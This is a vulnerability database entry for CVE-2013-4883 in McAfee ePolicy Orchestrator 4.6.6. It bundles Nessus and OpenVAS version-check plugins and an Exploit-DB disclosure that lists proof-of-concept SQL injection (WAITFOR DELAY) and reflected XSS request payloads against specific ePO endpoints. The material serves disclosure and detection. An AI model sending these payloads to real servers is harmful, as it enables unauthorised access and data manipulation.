ID CVE-2013-4883 Type cve Reporter cve@mitre.org Modified 2013-08-22T06:54:00
Description
Multiple cross-site scripting (XSS) vulnerabilities in McAfee ePolicy Orchestrator 4.6.6 and earlier, and the ePO Extension for the McAfee Agent (MA) 4.5 through 4.6, allow remote attackers to inject arbitrary web script or HTML via the (1) instanceId parameter core/loadDisplayType.do; (2) instanceId or (3) monitorUrl parameter to console/createDashboardContainer.do; uid parameter to (4) ComputerMgmt/sysDetPanelBoolPie.do or (5) ComputerMgmt/sysDetPanelSummary.do; (6) uid, (7) orion.user.security.token, or (8) ajaxMode parameter to ComputerMgmt/sysDetPanelQry.do; or (9) uid, (10) orion.user.security.token, or (11) ajaxMode parameter to ComputerMgmt/sysDetPanelSummary.do.
{"nessus": [{"lastseen": "2021-01-01T03:45:58", "description": "According to its self-reported version, the version of McAfee ePolicy\nOrchestrator (ePO) running on the remote host is 4.6.6 or earlier, and\ntherefore, has multiple reflected cross-site scripting vulnerabilities. \nAn attacker could exploit any of these issues by tricking a user into\nrequesting a specially crafted URL, resulting in arbitrary script code\nexecution.", "edition": 25, "published": "2013-07-17T00:00:00", "title": "McAfee ePolicy Orchestrator < 4.6.7 Multiple XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4883"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mcafee:epolicy_orchestrator"], "id": "MCAFEE_EPO_KB78824.NASL", "href": "https://www.tenable.com/plugins/nessus/68933", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68933);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\"CVE-2013-4883\");\n script_bugtraq_id(61422);\n script_xref(name:\"EDB-ID\", value:\"26807\");\n\n script_name(english:\"McAfee ePolicy Orchestrator < 4.6.7 Multiple XSS\");\n script_summary(english:\"ePO App Server version check\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A security management application on the remote host has multiple\ncross-site scripting vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of McAfee ePolicy\nOrchestrator (ePO) running on the remote host is 4.6.6 or earlier, and\ntherefore, has multiple reflected cross-site scripting vulnerabilities. \nAn attacker could exploit any of these issues by tricking a user into\nrequesting a specially crafted URL, resulting in arbitrary script code\nexecution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Jul/80\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=KB78824\");\n script_set_attribute(attribute:\"solution\", value:\n\"There is no solution available at this time.\n\nMcAfee plans on fixing these vulnerabilities in ePO version 4.6.7, which\nis scheduled to be released in late Q3 2013.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:epolicy_orchestrator\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mcafee_epo_app_server_detect.nasl\");\n script_require_keys(\"www/epo_app_server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:8443);\ninstall = get_install_from_kb(appname:'epo_app_server', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nver = install['ver'];\nurl = build_url(qs:dir, port:port);\n\n# this should never be true but this code will be defensive anyway\nif (ver == UNKNOWN_VER)\n audit(AUDIT_UNKNOWN_WEB_APP_VER, 'ePO Application Server', url);\n\n# KB78824 says 4.6.6 and earlier are affected. It doesn't explicitly\n# say that only 4.6.x is affected, so the plugin will flag all earlier versions\nfix = '4.6.7';\nif (ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'ePO Application Server', url, ver);\n\nset_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix + ' (release scheduled for late Q3 2013)\\n';\n security_warning(port:port, extra:report);\n}\nelse security_warning(port);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2020-04-23T19:06:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4882", "CVE-2013-4883"], "description": "This host is running McAfee ePolicy Orchestrator and is prone to multiple\nvulnerabilities.", "modified": "2020-04-21T00:00:00", "published": "2013-08-09T00:00:00", "id": "OPENVAS:1361412562310803865", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803865", "type": "openvas", "title": "McAfee ePolicy Orchestrator (ePO) Multiple Vulnerabilities-02 August13", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# McAfee ePolicy Orchestrator (ePO) Multiple Vulnerabilities-02 August13\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mcafee:epolicy_orchestrator\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803865\");\n script_version(\"2020-04-21T11:03:03+0000\");\n script_cve_id(\"CVE-2013-4882\", \"CVE-2013-4883\");\n script_bugtraq_id(61421, 61422);\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-21 11:03:03 +0000 (Tue, 21 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-08-09 15:40:39 +0530 (Fri, 09 Aug 2013)\");\n script_name(\"McAfee ePolicy Orchestrator (ePO) Multiple Vulnerabilities-02 August13\");\n\n script_tag(name:\"summary\", value:\"This host is running McAfee ePolicy Orchestrator and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"solution\", value:\"Upgrade to McAfee ePolicy Orchestrator version 4.5.7 or higher.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"insight\", value:\"Multiple flaw are due to improper sanitation of user supplied input via,\n\n - 'instanceId' parameter upon submission to the /core/loadDisplayType.do\n script.\n\n - 'instanceId', 'orion.user.security.token', and 'ajaxMode' parameters upon\n submission to the /console/createDashboardContainer.do script.\n\n - 'uid' parameter upon submission to the /core/showRegisteredTypeDetails.do\n and /ComputerMgmt/sysDetPanelBoolPie.do scripts.\n\n - 'uid', 'orion.user.security.token', and 'ajaxMode' parameters upon submission\n to the /ComputerMgmt/sysDetPanelSummary.do and /ComputerMgmt/sysDetPanelQry.do\n scripts.\");\n script_tag(name:\"affected\", value:\"McAfee ePolicy Orchestrator (ePO) version 4.6.6 and earlier\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary HTML\nor script code in a user's browser session in the context of an affected\nsite and inject or manipulate SQL queries in the back-end database, allowing\nfor the manipulation or disclosure of arbitrary data.\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/54143\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/26807\");\n script_xref(name:\"URL\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=KB78824\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_mcafee_epolicy_orchestrator_detect.nasl\");\n script_mandatory_keys(\"mcafee_ePO/installed\");\n script_require_ports(\"Services/www\", 8443);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!vers = get_app_version(cpe:CPE, port:port))\n exit(0);\n\nif(version_is_less(version:vers, test_version:\"4.6.7\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.6.7\");\n security_message(port:port, data:report);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T04:25:42", "description": "McAfee ePO 4.6.6 - Multiple Vulnerabilities. CVE-2013-4882,CVE-2013-4883. Webapps exploit for windows platform", "published": "2013-07-13T00:00:00", "type": "exploitdb", "title": "McAfee ePO 4.6.6 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-4882", "CVE-2013-4883"], "modified": "2013-07-13T00:00:00", "id": "EDB-ID:26807", "href": "https://www.exploit-db.com/exploits/26807/", "sourceData": "Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC\r\n\r\n\r\nMultiple vulnerabilities in McAfee ePO 4.6.6\r\n \r\nAffected Product:\r\nMcAfee ePO 4.6.6 Build 176 & (potentially) earlier versions\r\n \r\nTimeline:\r\n \r\n08 June 2013 - Vulnerability found\r\n12 June 2013 - Vendor informed\r\n12 June 2013 - Vendor replied/confirmed & opened service ticket\r\n12 July 2013 - Vendor responded with dates for solutions\r\n \r\nCredits:\r\nNuri Fattah of NATO / NCIRC (www.ncirc.nato.int)\r\n \r\nCVE: To be assigned\r\n \r\nNCIRC ID: NCIRC-2013127-01\r\n \r\nDescription:\r\nMultiple vulnerabilities, such as Cross-Site Scripting (XSS) and SQL\r\ninjection were identified in the latest version of McAfee ePO (4.6.6).\r\nAll identified vulnerabilities were discovered post authentication.\r\n \r\n\r\nVulnerability Details:\r\n \r\n1. SQL injection\r\n\r\na. GET\r\n/core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid=6waitf\r\nor%20delay'0%3a0%3a20'--\r\n&index=0&datasourceID=&orion.user.security.token=2LoWTAOfWJ4ZCjxY&ajax\r\nMode=standard HTTP/1.1\r\n\r\nb. /EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer\r\n&uid=1;%20WAITFOR%20DELAY%20'0:0:0';--\r\n&datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.queryFactory\r\n%3Aquery.2&index=0 HTTP/1.1\r\n\r\nMcAfee Solution:\r\n\r\nItem \"a\" will be addressed in ePO 4.6.7 due out in late Q3 2013.\r\nItem \"b\" has been addressed per Security Bulletin SB10043.\r\n(https://kc.mcafee.com/corporate/index?page=3Dcontent&id=3DSB10043)\r\n \r\n \r\n\r\n\r\n2. Reflected XSS\r\na. POST /core/loadDisplayType.do HTTP/1.1=20\r\ndisplayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard\r\n \r\nb. POST /console/createDashboardContainer.do HTTP/1.1\r\ndisplayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard\r\n \r\nc. POST /console/createDashboardContainer.do HTTP/1.1\r\nelementId=3DcustomURL.dashboard.factory%3Ainstance&index=3D2&pageid=3D30&\r\nwidth=3D1118&height=3D557&refreshInterval=3D5&refreshIntervalUnit=3DMIN&filteringEnabled=3Dfalse&mo\r\nnitorUrl=3Dhttp%3A%2F%2Fwww.xxxx.com\"/></iframe><script>alert(111057)</script>&orion.user.sec\r\nurity.token=3D9BslgbJEv2JqQy3k&ajaxMode=3Dstandard\r\n \r\nd. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=1\";</script><script>alert(147981)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1\r\n \r\ne. GET /ComputerMgmt/sysDetPanelQry.do?uid=<script>alert(149031)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1\r\n \r\nf. GET /ComputerMgmt/sysDetPanelQry.do?uid=>\"'><script>alert(30629)</script>&orion.user.security.token=>\"'><script>alert(30629)</script>&ajaxMode=>\"'><script>alert(30629)</script> HTTP/1.1\r\n \r\ng. GET /ComputerMgmt/sysDetPanelSummary.do?uid=<script>alert(146243)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1\r\n \r\n\r\nh. GET /ComputerMgmt/sysDetPanelSummary.do?uid=>\"'><script>alert(30565)</script>&orion.user.security.token=>\"'><script>alert(30565)</script>&ajaxMode=>\"'><script>alert(30565)</script> HTTP/1.1\r\n \r\n\r\nMcAfee Solution:\r\n\r\nEach of these items will be addressed in ePO 4.6.7 due out in late Q3\r\n2013.\r\n\r\n \r\n\r\n\r\nNuri FATTAH\r\nCTR\r\nNATO Communications and Information Agency\r\nEngineering & Vulnerability Management Sections\r\nNATO Information Assurance Technical Centre\r\nSHAPE, 7010 Mons, Belgium\r\nT: +32 6544 6140 F: +32 6544 5414\r\nSHAPE NCN: 254 6140\r\nE: nuri.fattah@ncirc.nato.int W: www.ncirc.nato.int", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26807/"}]}
